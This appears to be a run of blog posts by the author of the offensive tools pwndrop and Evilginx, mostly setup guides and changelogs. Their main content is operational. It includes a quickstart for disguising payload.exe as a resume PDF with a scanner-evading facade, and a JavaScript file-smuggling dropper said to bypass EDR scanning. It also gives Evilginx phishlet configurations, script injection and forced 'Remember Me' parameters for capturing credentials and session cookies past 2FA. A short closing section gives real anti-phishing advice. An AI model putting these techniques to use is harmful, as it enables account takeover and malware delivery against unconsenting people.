With pwndrop, you just need to specify the URL path the file should automatically redirect to.

I will describe the whole setup process in the Quickstart section below.

Change MIME types

Usually, it is the web server that decides what the MIME type of a downloaded file should be. The MIME type tells the web browser what to do with a file once it is downloaded.

For example, a file with the text/plain MIME type will be treated as a simple text file and displayed in the browser window. The same text file with the application/octet-stream MIME type will be treated as a binary file and the browser will save it to disk.
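
If you want to double-check what MIME type a server declares for a given file, inspecting the Content-Type response header is enough (URL hypothetical):

curl -sI https://www.evilserver.com/uploads/notes.txt | grep -i '^content-type'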

This allows for some interesting manipulation, especially with MIME type confusion exploits.

You can find the list of common MIME types here.

Automatic retrieval of TLS certificates from LetsEncrypt

Once you install pwndrop and point your domain's DNS A records to it, the first attempted HTTPS connection to pwndrop will initiate an automatic retrieval of a TLS certificate from LetsEncrypt.

Secure connections should work out of the box, but do check the readme on Github to learn more about setting it up, especially if you want to use the tool locally or without a domain.

Password protected and hidden admin panel

I wanted to make sure that the admin panel of pwndrop is never visible to people who are not meant to see it. Being in full control of the web server, I was able to completely lock down access to it. If the viewer's web browser does not have the proper authorization cookie, pwndrop will either redirect to a predefined URL or return a 404.

In order to authorize your browser, you need to open a secret URL path on your pwndrop domain. The default path is /pwndrop and should be changed in the settings as soon as the tool is deployed to your server.

Remember to change Secret Path to something unique

If you want to re-lock access to the admin panel, just change the Secret-Cookie name or value; you will then need to visit the Secret-Path again to regain access.

Quickstart

Now that I've hopefully managed to highlight all of the features, I want to give you a rundown of how to set up your first uploaded file with a facade and redirection.

Goal: Host our payload.exe payload and disguise it as a shared link at https://www.evilserver.com/uploads/MyResume.pdf. The payload file will be delivered through redirection as MyResume.pdf.exe. The MyResume.pdf file will be set up as a facade file and served as a legitimate PDF when facade mode is enabled, in order to temporarily hide the payload's true form from online scanners.

Here we go.

0. Deployment

If you don't yet have the server to deploy pwndrop to I highly recommend Digital Ocean. The cheapest $5/mo Debian 9 server with 25GB of storage space will work wonders for you. You can use my referral link to get an extra $100 to spend on your servers in 60 days for free.

I won't be covering the deployment process of pwndrop here on the blog as it may get outdated at some point. Instead check out the always up-to-date README with all the deployment instructions on Github.

If you are in a hurry, though, you can install pwndrop on Linux with a single command:

curl https://raw.githubusercontent.com/kgretzky/pwndrop/master/install_linux.sh | sudo bash

1. Upload your payload executable file

Make sure you authorize your browser first, by opening: https://<yourdomain.com>/pwndrop

Then open https://<yourdomain.com> and follow the instructions on the screen to create your admin account.

IMPORTANT! Do not forget to change the Secret-Path from /pwndrop to something of your choice in the settings.

Use the Upload button or drag & drop payload.exe onto pwndrop to upload your payload file.

2. Upload your PDF facade file

Click the top-left cog icon on your newly uploaded file and the settings dialog will pop out.

Click the facade file upload area or directly drop MyResume.pdf file onto it.

3. Set up redirection

Now you need to change the Path to what it should look like in your shared link. We want it to point to MyResume.pdf so change it to, say: /uploads/MyResume.pdf (you can choose whatever path you want).

Then click the Copy button at the right side of the Redirect Path editbox and it will copy the contents of the Path editbox to the editbox below.

Just add .exe to the copied path making it /uploads/MyResume.pdf.exe. This will be the path pwndrop redirects to, to serve the payload executable after the user clicks the shared link.

Keep in mind that the redirection will only happen when facade mode is disabled. When facade mode is enabled, pwndrop will serve the facade PDF file instead, not triggering any red flags.
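
A quick way to sanity-check this behavior from the command line is to watch the response headers (domain hypothetical); with facade mode enabled you should see the clean PDF served directly, and with it disabled you should see a redirect to the .exe path:

curl -sI https://www.evilserver.com/uploads/MyResume.pdf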

We will also change the MIME type of the facade file, which will show you the power of this feature. With the application/x-msdownload MIME type set for the PDF facade file, the Chrome browser will initiate a download when the shared link is clicked. When you change the MIME type to application/pdf, though, Chrome will open a preview of the PDF file, as it knows it is dealing with a PDF document.

Depending on whether you want the user to download the PDF or have it previewed in the web browser, you can play with different options.

Don't forget to click Save once you're finished with setting up the file.

4. Sharing your file

Now you're done. You can get the HTTP shared link by clicking the HTTP button; the http:// or https:// prefix will be picked based on how you're currently browsing the admin panel. Similarly, if you click the WebDAV button, you will get the WebDAV link copied to your clipboard.

If you ever decide you want to temporarily disable sharing for this file, just click the power button; the file will become hidden and links to it will stop working.

Next important thing is enabling the facade. Just click the third button from the left to flip the on/off switch to enable/disable facade mode. When the facade mode is enabled, pwndrop will serve the facade file, which you've uploaded for the given payload, instead of the original payload file. In our example it will deliver the PDF file instead of the payload executable.

Aaand that's it. Enjoy your first shared payload! Hope I've managed to not make the process too complex and that it was pretty easy to follow.

Future Development

I have a lot of ideas I want to implement in pwndrop, but instead of never releasing the tool and endlessly adding features because it is "not yet perfect", I've decided to release it as it is now. I will iteratively expand on it by adding new features from time to time.

So before you send me your feedback, check out what I plan to implement in near and far future. I really want to hear what features you'd like to see and how you'd want to use the tool.

Download Counter

This one should be implemented quite fast. It would add a download counter for each file, specifying the number of times the file is allowed to be downloaded. When the limit is reached, pwndrop will either serve the facade file or return a 404.

Download Tracker

This feature is a much-needed one, but requires a bit of work. I want to add a separate view panel, which will display in real-time all download requests for every payload file. The log should contain the visitor's User-Agent, IP address and some additional metadata that can be gathered from the particular request.

File dropping with Javascript

There is a method to initiate a file download directly through Javascript executed on an HTML page. It is an effective method for bypassing request scanners of several EDRs.

The idea is that the whole payload file gets embedded into an HTML page as an encrypted blob, which is then decrypted in real-time and served as a download to the web browser. That way there is never a direct request made to a file resource with specific URL, meaning there is nothing to download and scan. EDRs would have to implement Javascript emulation engines in order to execute a dropper script in a sandbox and analyze the decrypted payload.
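
A minimal sketch of this technique, with a hypothetical base64 blob standing in for the embedded payload (decryption omitted for brevity), could look like this:

const b64 = "TVqQAAMAAAAEAAAA..."; // payload bytes embedded in the page (truncated placeholder)
const bytes = Uint8Array.from(atob(b64), function (c) { return c.charCodeAt(0); });
const blob = new Blob([bytes], { type: "application/octet-stream" });
const link = document.createElement("a");
link.href = URL.createObjectURL(blob); // a blob: URL - no request to any file resource
link.download = "payload.exe";
document.body.appendChild(link);
link.click();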

Conditional facades

At the moment, facade mode can only be enabled/disabled manually, but eventually I'd like this process to be somewhat automated. Pwndrop could check if the request is made with a specific cookie or User-Agent, or comes from a targeted IP range, and then decide whether to serve the payload file or the facade file instead.

Password protected downloads

Sometimes it is good to share a file that downloads only after a valid password is entered. This is a feature I'd also like to have in pwndrop. I'm not yet sure if it should be done with basic HTTP authentication or something custom. Let me know if you have any ideas.

The End (for now!)

This is only the end of this post, but definitely not the end of pwndrop's development. I'd really like to see how you, the red teamers, plan to use this tool and how it can aid you in managing your payloads.

I also hope that you can use this tool not only for work. I hope it helps you share any files you want with the people you want, without having to worry about privacy and/or security issues. Self-hosting is always the best way to go.

Expect future updates on this blog and if you have any feedback you want to share, do contact and follow me on Twitter @mrgretzky.

Get the latest version of pwndrop here: [Download pwndrop from GitHub](https://github.com/kgretzky/pwndrop)

Enjoy and I'm waiting for your feedback!

Evilginx 2.3 - Phisherman's Dream

18 January 2019 at 05:44

Welcome to 2019!

As was noted, this will be the year of phishing automation. We've already seen the release of the new reverse-proxy tool Modlishka and it is only January.

This release would not have happened without the inspiration I received from Michele Orru (@antisnatchor), Giuseppe Trotta (@Giutro) and Piotr Duszyล„ski (@drk1wi). Thank you!

This is by far the most significant update since the release of Evilginx. The 2.3 update makes it unnecessary to manually create your own sub_filters. I talked to many professional red teamers (hello @_RastaMouse) who have struggled with creating their own phishlets, because of the unfair, steep learning curve of figuring out what strings to replace and where, in the proxied HTTP content. I can proudly say that these days are over and it should now be much easier to create phishlets from scratch.

If you arrived here by accident and you have no idea what I'm talking about, check out the first post on Evilginx. It is a phishing framework acting as a reverse proxy, allowing attackers to bypass 2FA authentication.

Let's jump straight into the changes.

Changelog - version 2.3

Here is a full list of changes in this version:

  • The proxy can now create most of the required sub_filters on its own, making it much easier to create new phishlets.
  • Added lures, with which you can prepare custom phishing URLs, each having its own set of unique options (help lures for more info).
  • Added OpenGraph settings for lures, allowing you to create enticing content for link previews.
  • Added the ability to inject custom Javascript into proxied pages.
  • Injected Javascript can be customized with attacker-defined data, specified in lure options.
  • Deprecated landing_path and replaced it with a login section, which contains the domain and path of the website's login page.

Diving into more detail now.

Automatic handling of sub_filters

In order for Evilginx to properly proxy a website, it must not stray off its path and it should make sure that all proxied links and redirections are converted from original URLs to the phishing URLs. If the browser navigates to the original URL, the user will no longer be proxied through Evilginx and the phishing will simply fail.

I am aware it was super hard to manually figure out what strings to replace, and that it took considerable amounts of time to analyze the HTML content of every page to manage substitutions, using a trial-and-error method.

Initially I thought that doing automatic URL substitution in the page body would just not work well. The guys I mentioned at the top of this post proved me wrong and I was amazed how well it can work when properly executed. When I saw this method successfully implemented and demonstrated in Modlishka, I was blown away. I knew I had to try and do the same for Evilginx.

It took me a whole weekend to implement the required changes and I'm very happy with the outcome. You can now start creating your phishlet without any sub_filters at all. Just define the proxy_hosts for the domains and subdomains that you want to proxy through and it should work out-of-the-box. You may need to create your own sub_filters only if there is some unusual substitution required to bypass security checks or you just want to modify some HTML to make the phishing scenario look better.

The best thing about automated sub_filter generation is the fact that the whole website's functionality may fully work through the proxy, even after the user is authenticated (e.g. Gmail's inbox).
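
To give you an idea, a bare-bones 2.3 phishlet can now start out as small as this sketch (hostnames hypothetical; credentials and auth_tokens sections omitted for brevity):

author: '@you'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'example-site.com', session: true, is_landing: true}
login:
  domain: 'www.example-site.com'
  path: '/login'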

Phishing with lures

The tokenized phishing link with a base64-encoded redirection URL was pretty ugly and definitely not perfect for carefully planned phishing attacks. As an improvement, I thought of creating custom URLs with attacker-defined paths, each assigned a different redirection URL, which would be navigated to on successful authentication through the phishing proxy. This idea eventually surfaced in the form of lures.

You can now create as many lures as you want for specific phishlets and you are able to give each of them the following options:

  • Custom path to make your phishing URLs look more inviting to be clicked.
  • Redirection URL to navigate the user to, after they successfully authenticate.
  • OpenGraph features, which will inject <og:...> meta tags into proxied website to make the phishing links generate enticing previews when sent in messengers or posted to social media.
  • Customized script content, which will be embedded into your injected Javascript code (e.g. for pre-filling the user's email address).
  • Description for your own eyes to not forget what the lure was for.

As an example, OpenGraph lure configuration can be used to generate an enticing link preview for WhatsApp.

On clicking the link, the user will be taken to the attacker-controlled proxied Google login page and, on successful authentication, they can be redirected to any document hosted on Google Drive.

The command for generating tokenized phishing links through phishlets get-url still works, although I'd consider it obsolete now. You should now generate phishing URLs with pre-created lures instead: lures get-url 0

To get more information on how to use lures, type in help lures and you will get a list of all sub-commands you can use.

Javascript injection

Now you can inject any javascript code into the proxied HTML content, based on URL path or domain. This gives incredible capabilities for customizing your phishing attack. You could for example make the website pre-fill the email of your target in the authentication form and display their profile photo.

Here is the example of injected javascript that pre-fills the target's email on LinkedIn login page:

js_inject:
  - trigger_domains: ["www.linkedin.com"]
    trigger_paths: ["/uas/login"]
    trigger_params: ["email"]
    script: |
      function lp(){
        var email = document.querySelector("#username");
        var password = document.querySelector("#password");
        if (email != null && password != null) {
          email.value = "{email}";
          password.focus();
          return;
        }
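        // form fields are not rendered yet - retry in 100 ms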
        setTimeout(function(){lp();}, 100);
      }
      setTimeout(function(){lp();}, 100);

You can notice that the email value is set to {email}, which lets Evilginx know that it should be replaced with the value set in the created lure. Setting the email value is done the following way:

: lures edit params 0 [email protected]

Note that the trigger_params variable contains the email value, which means that this javascript will ONLY be injected if the email parameter is configured in the lure used in the phishing attack.

A creative attacker could even use Javascript injection on Google to pre-fill the target's details for them.

Removal of landing_path section

To upgrade your phishlets to version 2.3, you have to remove the landing_path section and replace it with a login section.

I figured you may want to use a different domain for your phishing URL than the one which is used to display the login page. For example, Google's login page is always at the domain accounts.google.com, but you may want the phishing link to point to a different sub-domain like docs.phished-google.com. That way you can add docs.google.com to proxy_hosts and set the option is_landing: true.

The login section should contain:

login:
  domain: 'accounts.google.com'
  path: '/signin/v2/identifier'

IMPORTANT! The login section always defines where the login page resides on the targeted website.

That way the user will be automatically redirected to the login page domain even when the phishing link originated on a different domain.

Refer to the official phishlets 2.3.0 documentation for more information.

Have fun!

I can proudly say that the phishlet format is now close to perfect and, since the difficulty of creating one from scratch has dropped significantly, I will be starting a series of blog posts teaching how to create a phishlet from scratch, including how to configure everything.

The series will start very soon and posts will be written in hands-on step by step format, showing the whole process of phishlet creation from start to finish, for the website that I pick.

Make sure to follow me on Twitter if you want up-to-date information on Evilginx development.

[Follow me on Twitter](https://twitter.com/mrgretzky)
[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

Evilginx 2.2 - Jolly Winter Update

22 November 2018 at 06:39

Tis the season to be phishing!

I've finally found some free time and managed to take a break to work on preparing a treat for all of you phishing enthusiasts out there. Just in time for the upcoming holiday season, I present you the chilly Evilginx update.

[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

If you've arrived here by accident and have no idea what I'm writing about, do check the first post about Evilginx 2 release.

Without further ado, let's jump straight into the changelog!

Changelog - version 2.2

First, here is a full list of changes made in this version.

  • Added option to capture custom POST arguments in addition to credentials. Check the custom field under credentials.
  • Added feature to inject custom POST arguments to requests. Useful for silently enabling "Remember Me" options, during authentication.
  • Restructured phishlet YAML config file to be easier to understand (phishlets from previous versions need to be updated to new format).
  • Removed name field from phishlets. Phishlet name is now determined solely based on the filename.
  • Now when any of auth_urls is triggered, the redirection will take place AFTER response cookies for that request are captured.
  • Regular expression groups working with sub_filters.
  • Phishlets are now listed in a table.
  • Phishlet fields are now selectively lowercased and validated upon loading to prevent surprises.
  • All search fields in the phishlet are now regular expressions by default. Remember about proper escaping!

Now for the details.

Added option to capture custom POST arguments

You can now capture additional POST arguments in requests. Some people mentioned they often need to capture data from other fields like PINs or tokens. Now you can.

Captured field values can be viewed in captured session details.

Find out how to specify custom fields for capture in the official documentation.
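
For reference, capturing an additional PIN field could look roughly like this in the restructured format (a sketch only - the field names and layout here are assumptions, so consult the documentation above for the exact syntax):

credentials:
  custom:
    - key: 'pin'
      search: '(.*)'
      type: 'post'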

Added feature to inject custom POST arguments to requests. Useful for silently enabling "Remember Me" options, during authentication

Almost all websites provide an option to log in without permanently remembering the logged-in user. This results in the website storing only temporary session cookies or cookies with a short lifespan, which are later invalidated both on the server and the client.

Capturing session cookies in such a scenario does not give the attacker permanent access. This is why it is most important that the phished user ticks the "Remember Me" checkbox to inform the server that persistent authentication is requested. Until now, that decision rested on the phished user's shoulders.

In this version it is now possible to inject an argument into the POST request to inform the server that the "Remember Me" checkbox was ticked (even though it could've been deliberately left unchecked).

As an example, this part of a phishlet will detect the login POST request, containing username and password fields and will add/replace the remember_me parameter to always have a value of 1:

force_post:
  - path: '/sessions'
    search:
      - {key: 'session\[user.*\]', search: '.*'}
      - {key: 'session\[pass[a-z]{4}\]', search: '.*'}
    force:
      - {key: 'remember_me', value: '1'}
    type: 'post'

Play around with it and I'm sure this feature may have other uses that I haven't thought about yet.

Remade phishlet YAML file format

In preparation for the final version of the phishlet file format, I did some restructuring. You will need to make some minor modifications to your custom phishlets to make them compatible with Evilginx 2.2.0.

I've now also properly documented the new phishlet file format, so please get familiar with it here:
Phishlet File Format 2.2.0 Documentation

Removed name field from phishlets

Many of you reported the proxy returning TLS errors when testing your own custom phishlets. They were caused by custom phishlets having the same name as another loaded phishlet.

That name field caused enough confusion, so I decided to remove it altogether. The phishlet name is now solely determined by the phishlet filename, without the .yaml suffix. This guarantees a unique name for each phishlet, as two identical filenames can't exist in the directory from which phishlets are loaded.

Now when any of auth_urls is triggered, the redirection will take place AFTER response cookies for that request are captured

In previous versions, whenever any of auth_urls triggered the session capture, the redirection would happen immediately, before Evilginx could parse the response received from the server.

This resulted in Evilginx not being able to parse and capture cookies returned in responses to that last request that would trigger the session capture and redirection.

This is now changed and you can safely pick the trigger URL path that still returns session cookies in the response, as they will be captured and saved, before the redirection happens.

Regular expression groups working with sub_filters

I've been asked about this recently and, upon checking, found out that it had already been implemented since the Evilginx 2 release.

You can define a regular expression group, as you'd normally do, with parentheses in the search field, and later refer to it in the replace field with ${1}, where 1 is the group index; you can naturally use more than one group.

Example:

  - {triggers_on: 'www.linkedin.com', orig_sub: 'cdn', domain: 'linkedinapis.com', search: '//{hostname}/([0-9a-z]*)/nhome/', replace: '//{hostname}/${1}/nhome/', mimes: ['text/html', 'application/json']}

Refer to the Go language documentation to see exactly how it works (make sure to see the example section):
https://golang.org/pkg/regexp/#Regexp.ReplaceAllString

Phishlets are now listed in a table

Simply put - the phishlet listing was an ugly mess. Now it looks good.

Phishlet fields are now selectively lowercased and validated upon loading to prevent surprises

Evilginx will now validate each phishlet on loading. It will try its best to inform you about any detected issues with an error message to make it easier to debug any accidental mistakes like typos or missing fields.

All search fields in the phishlet are now regular expressions by default

The phishlet documentation now specifies which fields are considered to be regular expressions, so do remember about proper escaping of regular expression strings.

As a quick example, if you used to look for login.username POST key to capture its value, you need to now define the field as key: 'login\.username', because . is one of the special characters used in regular expressions, which has a separate function.

Enjoy!

As always, I wanted to thank everyone for amazing feedback and providing ideas to improve Evilginx.

Keep the bug reports and feature requests incoming!

[Follow me on Twitter](https://twitter.com/mrgretzky)
[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

Evilginx 2.1 - The First Post-Release Update

10 September 2018 at 04:20

About 2 months ago, I released Evilginx 2. Since then, a lot of you reported issues or wished for specific features.

Your requests have been heard! I've finally managed to find some time during the weekend to address the most pressing matters.

[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

Here is what has changed and how you can use the freshly baked features.

Changelog - version 2.1

Developer mode added

It is finally much easier to develop and test your phishlets locally. Start Evilginx with the -developer command-line argument and it will switch itself into developer mode. In this mode, instead of trying to obtain LetsEncrypt SSL/TLS certificates, it will automatically generate self-signed certificates.

Evilginx will generate a new root CA certificate when it runs for the first time. You can find the CA certificate at $HOME/.evilginx/ca.crt or %USERPROFILE%\.evilginx\ca.crt. Import this certificate into your certificate storage as a trusted root CA and your browsers will trust every certificate generated by Evilginx.
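
On a Debian-based system, importing the CA certificate into the system store can look like this (browsers with their own certificate stores, like Firefox, need the certificate imported separately):

sudo cp ~/.evilginx/ca.crt /usr/local/share/ca-certificates/evilginx.crt
sudo update-ca-certificates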

Since this feature allows for local development, there is no need to register a domain at domain registrars. Just use any domain you want and set the server IP to 127.0.0.1 or your LAN IP:

config domain anydomainyouwant.com
config ip 127.0.0.1

It is important that your computer redirects all connections to the phishing sites to your local IP address. In order to do that, you need to modify the hosts file.

First, generate the hosts redirect rules with Evilginx, for the phishlet you want:

: phishlets hostname twitter twitter.anydomainyouwant.com
: phishlets get-hosts twitter

127.0.0.1 twitter.anydomainyouwant.com
127.0.0.1 abs.twitter.anydomainyouwant.com
127.0.0.1 api.twitter.anydomainyouwant.com

Copy the command output and paste it into your hosts file. The hosts file can be found at:
Linux: /etc/hosts
Windows: %WINDIR%\System32\drivers\etc\hosts

Remember to enable your phishlet and you can start using Evilginx locally (can be useful for demos too!).

Authentication cookie detection was completely rewritten

There were some limitations in the initial implementation of session cookie detection, so I rewrote a significant portion of its code. Now, Evilginx is able to detect and properly use httpOnly and hostOnly flags, as well as path values for each captured cookie.

IMPORTANT! Previously captured sessions will not load properly with latest version of Evilginx, so make sure you backup your captured sessions before updating.

Evilginx will now properly handle cookie domains .anydomain.com vs anydomain.com. This is very important, as I've noticed during testing that imported cookies will not provide a working session if the cookie domain is set improperly.

The difference is that a cookie set for the domain .anydomain.com will be sent with requests to anydomain.com and also to any of its sub-domains (e.g. auth.anydomain.com), while a cookie set for the domain anydomain.com will be sent only with requests to anydomain.com.
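
In exported cookie data this difference boils down to the leading dot and the hostOnly flag; roughly (format simplified, other fields elided):

{"domain": ".anydomain.com", "hostOnly": false, "name": "session", ...}
{"domain": "anydomain.com", "hostOnly": true, "name": "session", ...}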

I had to also update the current phishlets to properly detect cookie domain names (with the . prefix or without), so you may need to update your private ones accordingly.

Regular expressions for cookie names and POST key names

It has come to my attention that some websites will dynamically generate cookie names or POST key names, based on user ID or some other factors. Since Evilginx was only able to look for fixed names, it would never be able to properly capture such cookies or intercept a username/password field in a POST request.

Now you can use regular expressions for both cookie names and the POST user_regex and pass_regex keys, by appending regexp to the string after a comma , separator.

Here is an example. Let's say we want to capture a cookie named session_user_738299, where 738299 is the user ID, which will be different for every user and thus a dynamic value. We can set up capturing of this cookie with regular expressions, like this (assuming that the numerical value is always 6 digits):

auth_tokens:
  - domain: '.anydomain.com'
    keys: ['session_user_[0-9]{6},regexp']

This can also be done for POST keys. If we need to intercept a POST key that will hold a username, with the name user[session_id_36273], we can do:

user_regex:
  key: 'user\[session_id_.*\],regexp'
  re: '(.*)'

Same applies to pass_regex of course.

URL path detection for triggering session capture

You will find websites that set the session cookie ID before you even start typing your email into the login form. In such cases, Evilginx would detect the session cookie, capture it and, since it was the last cookie it was meant to capture, consider the session captured, even though no credentials had been entered yet.

As smart people pointed out on Github, this can be remedied by detecting an HTTP request to a specific URL path, which happens only after the user has successfully authenticated (e.g. /home).

Now you can add a new auth_urls parameter in your phishlet, where you provide an array of URL paths that will trigger the session capture. If we wanted to look for an HTTP request to /home, we could set it up like this:

auth_urls:
  - '/home'

With auth_urls set up in the phishlet, Evilginx will not trigger a session capture even when it considers all session cookies captured. The cookies will be stored only after an HTTP request to any of the specified URL paths is made.

IMPORTANT! URL paths in auth_urls are all considered regular expressions, so proper escaping may be required (also no need to add ,regexp to each string)

There is now a cool trick that utilizes both the auth_urls feature and regular expressions for cookie names.

If you ever come across a website that sends cookies in a way that makes the right ones impossible to reliably pin down with regular expressions, you can just opt for capturing all the cookies for a given domain and waiting for the URL trigger.

This is how you'd do it:

auth_tokens:
  - domain: '.anydomain.com'
    keys: ['.*,regexp'] # captures all cookies for that domain
auth_urls:
  - '/home' # saves all captured cookies when this request is made

This is a very messy approach and I'd prefer to not see phishlets rely on that too much, but it can be done.

Empty subdomains now work

There was a bug that would prevent phishlets from working with websites that do not use any subdomains for some of their hostnames. This is no longer an issue and, as proof that it is fixed, I've slightly modified the twitter phishlet to work with the twitter.com hostname.

Wrapping up

Keep posting issues you are having with creating your own phishlets as I'm sure there will still be scenarios that will require some adjustments made to Evilginx.

You can update by pulling the latest changes from the master branch. I will post a binary release once I confirm that everything is stable.

[Follow me on Twitter](https://twitter.com/mrgretzky)
[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

I have some nice ideas still for upcoming releases like dynamic custom Javascript injection and forcing "Remember Me" check boxes by POST parameter injection.

Hope you are liking Evilginx so far.

Enjoy this update!

Evilginx 2 - Next Generation of Phishing 2FA Tokens

26 July 2018 at 06:01

It's been over a year since the first release of Evilginx and looking back, it has been an amazing year. I've received tons of feedback, got invited to WarCon by @antisnatchor (thanks man!) and met amazing people from the industry. A year ago, I wouldn't have even expected that one day Kevin Mitnick would showcase Evilginx in his live demos around the world and Techcrunch would write about it!

At WarCon I met the legendary @evilsocket (he is a really nice guy), who inspired me with his ideas to learn Go and rewrite Evilginx as a standalone application. It is amazing how Go seems to be ideal for offensive tool development and bettercap is its best proof!

This is where Evilginx is now. No more nginx, just pure evil. My main goal with this tool's release was to focus on minimizing the installation difficulty and maximizing the ease of use. Usability was not necessarily the strongest point of the initial release.

Updated instructions on usage and installation can always be found up-to-date on the tool's official GitHub project page. In this blog post I only want to explain some general concepts of how it works and its major features.

Update: Check also version 2.1 release post

TL;DR What am I looking at?

Evilginx is an attack framework for setting up phishing pages. Instead of serving templates of sign-in page lookalikes, Evilginx becomes a relay between the real website and the phished user. The phished user interacts with the real website, while Evilginx captures all the data being transmitted between the two parties.

Evilginx, being the man-in-the-middle, captures not only usernames and passwords, but also authentication tokens sent as cookies. Captured authentication tokens allow the attacker to bypass any form of 2FA enabled on the user's account (except for U2F - more about it further below).

Even if phished user has 2FA enabled, the attacker, outfitted with just a domain and a VPS server, is able to remotely take over his/her account. It doesn't matter if 2FA is using SMS codes, mobile authenticator app or recovery keys.

Take a look at the video demonstration, showing how attackers can remotely hack an Outlook account with 2FA enabled.

Disclaimer: The Evilginx project is released for educational purposes and should be used only in demonstrations or legitimate penetration testing assignments with written permission from the to-be-phished parties. The goal is to show that 2FA is not a silver bullet against phishing attempts and that people should be aware that their accounts can be compromised nonetheless, if they are not careful.

[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)
**Remember - 2FA is not a silver bullet against phishing!**

2FA is very important, though. This is what head of Google Threat Intelligence had to say on the subject:

2FA is super important but please, please stop telling people that by itself it will protect people from being phished by the Russians or governments. If attacker can trick users for a password, they can trick them for a 6 digit code.

โ€” Shane Huntley (@ShaneHuntley) July 22, 2018

Old phishing tactics

Common phishing attacks, which we see every day, are HTML templates prepared as lookalikes of popular websites' sign-in pages, luring victims into disclosing their usernames and passwords. When the victim enters his/her username and password, the credentials are logged and the attack is considered a success.

I love digging through certificate transparency logs. Today, I saw a fake Google Drive landing page freshly registered with Let's Encrypt. It had a hardcoded picture/email of presumably the target. These can be a wealth of info that I recommend folks checking out. pic.twitter.com/PRweQsgHKD

โ€” Justin Warner (@sixdub) July 22, 2018

This is where 2FA steps in. If the phished user has 2FA enabled on their account, the attacker requires an additional form of authentication to supplement the username and password they intercepted through phishing. That additional form of authentication may be an SMS code sent to your mobile device, a TOTP token, a PIN or the answer to a question that only the account owner would know. An attacker without access to any of these will never be able to successfully authenticate and log into the victim's account.

Old phishing methods which focus solely on capturing usernames and passwords are completely defeated by 2FA.

Phishing 2.0

What if it was possible to lure the victim not only into disclosing his/her username and password, but also into providing the answer to any 2FA challenge that may come after the credentials are verified? Intercepting a single 2FA answer would not do the attacker any good, though. The challenge will change with every login attempt, making this approach useless.

After each successful login, the website generates an authentication token for the user's session. This token (or multiple tokens) is sent to the web browser as a cookie and is saved for future use. From that point, every request sent from the browser to the website will contain that session token, sent as a cookie. This is how websites recognize authenticated users after successful authentication. They do not ask users to log in every time the page is reloaded.

This session token cookie is pure gold for the attacker. If you export cookies from your browser and import them into a different browser, on a different computer, in a different country, you will be authorized and get full access to the account, without being asked for usernames, passwords or 2FA tokens.

In Evilginx 2, the successfully captured session token cookie is shown in the captured session's details.

Now that we know how valuable the session cookie is, how can the attacker intercept it remotely, without having physical access to the victim's computer?

Common phishing attacks rely on creating HTML templates which take time to make. Most work is spent on making them look good, being responsive on mobile devices or properly obfuscated to evade phishing detection scanners.

Evilginx takes the attack one step further and, instead of serving its own HTML lookalike pages, it becomes a web proxy. Every packet coming from the victim's browser is intercepted, modified and forwarded to the real website. The same happens with response packets coming from the website; they are intercepted, modified and sent back to the victim. With Evilginx there is no need to create your own HTML templates. On the victim's side everything looks as if he/she was communicating with the legitimate website. The user has no idea that Evilginx sits as a man-in-the-middle, analyzing every packet and logging usernames, passwords and, of course, session cookies.

You may ask now: what about the encrypted HTTPS connection using SSL/TLS that prevents eavesdropping on the communication data? Good question. The problem is that the victim is only talking, over HTTPS, to the Evilginx server and not to the true website itself. Evilginx initiates its own HTTPS connection with the victim (using its own SSL/TLS certificates), receives and decrypts the packets, only to act as a client itself and establish its own HTTPS connection with the destination website, where it sends the re-encrypted packets as if it was the victim's browser itself. This is how the trust chain is broken and the victim still sees that green lock icon next to the address bar in the browser, thinking that everyone is safe.

When the victim enters the credentials and is asked to provide a 2FA challenge answer, they are still talking to the real website, with Evilginx relaying the packets back and forth, sitting in the middle. Even while being phished, the victim will still receive the 2FA SMS code to his/her mobile phone, because he/she is talking to the real website (just through a relay).

After the 2FA challenge is completed by the victim and the website confirms its validity, the website generates the session token, which it returns in the form of a cookie. This cookie is intercepted by Evilginx and saved. Evilginx determines that authentication was a success and redirects the victim to any URL it was set up with (online document, video etc.).

At this point the attacker holds all the keys to the castle and is able to use the victim's account, fully bypassing 2FA protection, after importing the session token cookies into his web browser.

Be aware that: Every sign-in page, requiring the user to provide their password, with any form of 2FA implemented, can be phished using this technique!

How to protect yourself?

There is one major flaw in this phishing technique that anyone can and should exploit to protect themselves - the attacker must register their own domain.

By registering a domain, the attacker will try to make it look as similar to the real, legitimate domain as possible. For example, when targeting Facebook (real domain facebook.com), the attacker can register a domain like faceboook.com or faceb00k.com, maximizing the chances that phished victims won't spot the difference in the browser's address bar.

That said - always check the legitimacy of website's base domain, visible in the address bar, if it asks you to provide any private information. By base domain I mean the one that precedes the top-level domain.

As an example, imagine this is the URL and the website, you arrived at, asks you to log into Facebook:

https://en-gb.facebook.cdn.global.faceboook.com/login.php

The top-level domain is .com and the base domain would be the preceding word, with the next . as a separator. Combined with the TLD, that would be faceboook.com. When you verify that faceboook.com is not the real facebook.com, you will know that someone is trying to phish you.

As a side note - a green lock icon seen next to the URL in the browser's address bar does not mean that you are safe!

The green lock icon only means that the website you've arrived at encrypts the transmission between you and the server, so that no one can eavesdrop on your communication. Attackers can easily obtain SSL/TLS certificates for their phishing sites and give you a false sense of security with the ability to display the green lock icon as well.

Figuring out if the base domain you see is valid may not always be easy and leaves room for error. It became even harder with the support of Unicode characters in domain names. This made it possible for attackers to register domains with special characters (e.g. in Cyrillic) that would be lookalikes of their Latin counterparts. This technique received the name of a homograph attack.

As a quick example, an attacker could register a domain facebooĸ.com, which would look pretty convincing even though it is a completely different domain name (ĸ is not really k). It got even worse with Cyrillic characters, allowing for ebаy.com vs ebay.com. The first one contains a Cyrillic character that looks exactly like its Latin counterpart.
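
One reliable way to unmask such lookalikes is to let URL parsing convert the hostname to its punycode form. In a browser console (or Node.js) this is a one-liner; the domain below contains the Cyrillic character:

const u = new URL("https://ebаy.com/"); // the "а" here is Cyrillic U+0430
console.log(u.hostname); // prints the xn--... punycode form, not "ebay.com"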

Major browsers were fast to address the problem and added special filters to prevent domain names from being displayed in Unicode, when suspicious characters were detected.

If you are interested in how it works, check out the IDN spoofing filter source code of the Chrome browser.

Now you see that verifying domains visually is not always the best solution, especially for big companies, where it often takes just one employee to get phished and allow attackers to steal vast amounts of data.

